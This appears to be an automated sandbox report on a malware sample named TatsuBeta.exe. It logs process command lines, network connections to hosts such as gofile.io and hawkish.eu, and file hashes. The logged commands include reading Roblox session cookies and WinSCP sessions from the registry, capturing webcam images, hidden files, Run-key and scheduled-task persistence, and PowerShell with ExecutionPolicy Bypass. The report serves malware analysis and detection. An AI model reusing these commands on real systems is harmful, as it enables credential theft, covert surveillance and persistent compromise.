powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\r1kB0zLVK2l9POWbEjWi\System\cam.2100_Admin"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\r1kB0zLVK2l9POWbEjWi\System\cam.2100_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_LTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutyHOe4.ps1" -RunAsAdministrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutyHOe4.ps1" -RunAsAdministrator"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_LTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_LTNxen.vbs /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupLTNxen /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupLTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupLTNxen /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupLTNxen /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupLTNxen /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4996 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1684,16488817615885489717,17376577024114886649,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:443 dns.google tcp
FR 151.80.29.83:443 api.gofile.io tcp
US 136.175.8.205:443 store6.gofile.io tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp

Files


C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\ta.pak

MD5 4a99278f9540f7e9bd28b8cd696e88cd
SHA1 b26ef40dc6e3d1bc23a57da9643b980f4e8fc710
SHA256 c17ff350cb6ba80a46f30f12178fae6f478d8a91026fe03d684725e224420307
SHA512 196708ae1f3fe81dd4e5b2b257655bbfe572671013932a52a5097a8ee377e450f9260fc2fe28ab9408b652aef037df361e89d3391c6cb189d2255d467583c1ea

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar

MD5 c9a3586d0bd6dccdfcb8964f3e299c86
SHA1 d064c9088319ca7284416285b17f3c1889a4f13a
SHA256 15bea9fccb5745dc04e3c7e63cdf9d30adbe43ef0a66343068754d67d784bbec
SHA512 3a7803ac94f16e2628bc99c35b8eece5ce76d18e5cf76e3c7ab9eb832f93cbafe6d11223fb745f50e6702f2ffec552553beaf323d7912ffa03ced58ce7a188e7

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 983cc8e66fe31e3e7fdd08ede4c6f271
SHA1 471dbb77415dae32f0a880854463b7c6745eaab9
SHA256 f730e24644a0fba46e0123abd548f744d584d33db6a7e14caf2aa0e3f18bd9fb
SHA512 9fe848f542936ca9593270659fbb2c83dfda27c105500bd58e93bbdaef01182e8ba67e4a24f33b1c2d3c66449cda62bf59898e8278ab23f438306b027920fbff

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\swiftshader\libEGL.dll

MD5 864d7d009202a72845bcc95be7c75854
SHA1 7402c13cc011ae4a22b648e04e7b7a40aacd9228
SHA256 c6aa0cb88a9a643e460dd13070f8d543df5be7dc837713f3226f24a72793dd94
SHA512 2832ea2bd94a1710eec09c720898bd246a899150e2f8106013a7abcf69f5ef55b9161112c13c13b38fc5088625ca7be1c4968af52890c489a28581e21544e6ce

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsh669A.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\v8_context_snapshot.bin

MD5 133fd2944ddb828873ed7852e554e2f7
SHA1 94caa52e6fd4442591e62a1facdde80fafc870a0
SHA256 c350b9f0fbe47ad01cb66cc0ecd82f7fee975ae84adb3b61e8b707fbe9dc7e5a
SHA512 d4f3f95588adc75d957060f99c54fb8082ebedc1a1bded23e5ffdc50f9cdb1df5d8eec014d521e2d038d3f42ea20a04cd6cebce79e23415efcf8441e86c947a8

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 edbb13c737108da1fa035d68850bd411
SHA1 1dec03222c25ec60a432671ec607ca8f0f86d049
SHA256 7658395181bf58d1b7ff06ac620e7dd2e5121bf1f3dce268342bbea296dbad08
SHA512 66867269ff0dc764f73fdf667ec58b746f500d5dd3208f4e8815e684a1b09cc8a5d175ebca8404642893f5f99ff0327aeaa6069782b4da6beb3bbb46c2e90489

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 6970b63501b4990ef3b9a7bc9e0239e9
SHA1 280ebafc6db534643fe3382f334a7ee0120f6655
SHA256 05cf68585c4a08d78abedce8ac4c2b3fdf251633b2781b0bedb54840278f2a8d
SHA512 7c15743076f4e4bd09f3567ee146370ad06f8dbd3e2c1e2d2535a50af029ff9f5b4d7a470281ba6d6d570bfafbf55997da534ac7aed33269845e8c4b97137ad1

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 54eab9765a617e3292317a233716b14b
SHA1 1e874fb3a34cfc28c50555df058599c690fcc8f0
SHA256 a628325fd3c6058b1c62d25731db44cf2350bd8bb843c08fc7f12c8c22dcd139
SHA512 7e6e312ca96c39118a0e0be4874da40e56fdb87007667fe6b02ec9dee8f9ff0dc7e7e93906e2ca459a799c5d523c37d95e024b6660783905d10d5b4ee8c96dea

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 b54d789237602b05fd25e4b6dfdeef00
SHA1 492e5a28cc1576ef4a246587c690fe0039a4d6b4
SHA256 ed763c38a390f68f79f268c06d1f26477053c2546b8362e02f68c8fba14351d5
SHA512 8cba5f4ef3aec60c013a1f6384216c7ef835323f68f86446fbf1c90d4f1303aabd96f82ae64afbda9b77bda06b416b5caa3c1f3235bcd4ebe3e95949508910bc

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 cb449e3dedc1e4729d7e7089068e8637
SHA1 7459f6dcf3f76ba523be4f803747474d88cefa64
SHA256 e4a04e8087403ac6f4c363469bce1044080b872f4d196609f996af24deab07ea
SHA512 2e8d756d007353b95c86d4840436b6fb3d3976d632da9ad73ce896d43a602a3d4c1c5672d8766d5928d1203c72ee35ac755bff29020fc5597b3de5516226db53

C:\Users\Admin\AppData\Local\Temp\8a37fbd9-0b4a-488f-97d8-fe5bb5289e92.tmp.node

MD5 a6569ecf86793dd5da441df497c3406d
SHA1 13b1f8777d688a01eba748e30f6d4aaf62a66ec9
SHA256 65624992a6b5de1835cebcc6a898edc02dc0944aa3ec758a57c3e22e7268505a
SHA512 44d04c9f69131aba61c755c6abd2b76f9d90d8374a5ef40f4c5b028c1d55074bc5058ee213f87c26e4820dea314d2143de622c17741d014dde4f404aa54f562d

C:\Users\Admin\AppData\Local\Temp\11280b26-4c11-42d1-b001-82fd0f510079.tmp.node

MD5 27301b2210979c2e7def147c8767be00
SHA1 f9a36d055876437671e5045b0d135ef2986d92d8
SHA256 10f5a8e9547f2c8c58e54b116f665865b0fe6ac9783adcf9bccd8b28b4fe568e
SHA512 60400b892c74115e5a598c131a9287b47c2525ffc2b2ee5872a6d3edba5c9891711c1f83f07ebda974ec3be790cf20fa91409e877bee8c781f7524e3c5d41fd5

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 6f4ec3fc0129c08fab19de4165707444
SHA1 fffc6e05243c2bd5e45de66c84eb7360545b76d2
SHA256 4ec7d1e3c23c0b95a8fc449b1f8fd4de3eca1c09c253888073b84a0909db157f
SHA512 ef607f141317ea44ac574584e38125f84b9e378c1ed540c0626fbb25fe21ad278d9750f8a3c8574922f107be5871b8e72366812e1937eee4ab4b20a8d9873d2f

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\locales\en-US.pak

MD5 e27a6d0f0f3eb0963f7959fcca6f716e
SHA1 9fc14897a88b74a53ffb7b608851358e55c32dd0
SHA256 6164ddc1bc8602dc31441654a7d6e75a9ce4e505902a0c1cd9a9f5a4503aae1b
SHA512 481a976acf697483217662419565057f74e3857c70c286aee9a54abb79c28e461a0d0daebb971c003ec1dbf58a86c29b241f8915c5558ce045e52499b113c83a

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_200_percent.pak

MD5 2ac3f6a83cb12c882b8a9ca2beb7bf4e
SHA1 c85ce1b86302bd93b201e5415e07c144015ce8ee
SHA256 bf79a8c4fcd2ab6a131dce86e34f9699acb6e32691535448b1b4ef1bc7ec3ab5
SHA512 e770ec8ca49a1cf33c03f80546dd671a72d752c0c4167b1b58238b47057f218c052ee0983331daa2785ad88cdb25443cd031fb8bf96a68bfe0981eca31a5c894

memory/4888-578-0x00007FFADEEA0000-0x00007FFADEEA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 54dead2e813b6310aa5a8d39de3642e4
SHA1 e9941feebd01c8b96dc7f7b345bbb8f0106a6390
SHA256 85efafb5a991f99b20ccfa756dd5930454f2c7bc912b9f5c341f3cbdbcfe38d9
SHA512 a5db89296cf8fa6b950ff1dbc9b089a2c72a62c57586ff2c075617f9693e6a8b6e97871e997f2de0720bcc4a42e7de9658e04f84e4c646594a4f96eeba2e02f3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 1d561a323e82814dbb0f5d89b69bfbc0
SHA1 1e15568d2bd4175efa8be8bab1311651b4b2caec
SHA256 6e5993e63cadf1d6044f2b4352baa372b588983cf928a34f00e6d4779bd9a5e2
SHA512 20996c3574a31c48f27dfdfd049b0c8a24a306063af4074988fa0e0e653120c1b5b584afe443ce77f78750ae0343bd201da5810c1a3c7cc229ec5f8aac4ecb59

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 b2019cb477a6edf18a9d54a8ca573cd0
SHA1 6d4d4efe6f21902e2e00f6ca48170f23714c0cd6
SHA256 3ebbb95f749dcecd387d957ae59989b920e12ee0c99f45323d3a5b6509cc92de
SHA512 4cfe570723afccf277f2b95bf1caa5d8a5e556150a05576e7458e7997652f3236b91522680a202d01afb0ca4ebeb574d7698577d210a07f0370f4e2335935c8b

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 e26ff6f318133eb0f6f94786953dc963
SHA1 5e9e7dc6ba023bd42cac17fe91c6a24432d9b6c5
SHA256 4b51e1bc671bb9732df5e05afa9b622b20332c26d863617e8383d12d3df230ba
SHA512 3d839b863f2b8566832c7f12f0758f69af3c10ffc405ef5ccdf7807b8c27fe9b76d73c852975cf3e1b0daf381b45cd87c09cb5d98f5453649f872ce8642fe698

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libegl.dll

MD5 a2f8733c7c9c1631d58ad485653c4713
SHA1 7322da0d2f20bd031f402b1ca3f6482f1f1bc344
SHA256 ca519d25fdf410d3117a1bb28fc52689392bfed896bf1d4915423681a1e3d2a3
SHA512 4956e50dc73bcf6c4c8fa463aeb05d66a0beb7ce6bb78b39f03802ceb680f5f22fe32a1b0cfd674ff8ad4cf672e77c8b31c522796956450f6302fc6801548183

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 f5174910047b05fa744f4196a490bbd8
SHA1 7a0d6475051a61ba3a2e49099627a21c69bc438f
SHA256 c7942f3e52fce842fdcad187f5d9447fa8adcdc95a06176c0a452271f1096f35
SHA512 cee4fcb8bc5919581c1fdc626b32fddeac80001ce5604f02cc9cb12d79721576623b08afb47b1ea6369766617c4b705312fe5c8334ffaf237ac4d14b52053bd3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 28697e5977431af26e5a7565ac0c00bb
SHA1 9bff4534902a08ef819b192d06984cb1fa4e08b1
SHA256 679d905977c40affdd1947a96ec5c53cb1e3da1d12328a8de3a323600df5a136
SHA512 fe9b8a2271b187f7aff7fdcc8129e3fa61f0d828f4cbaed295d0e2f14603f9289f7cd0824c7a19a9e27f89c7996e152b9ae3153e5fc52c1111104163154147eb

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 e3a83bc53870039aa3b18ae41684bd04
SHA1 dab3f64a9f1795dc3f2f0f10b1f6cc067772793c
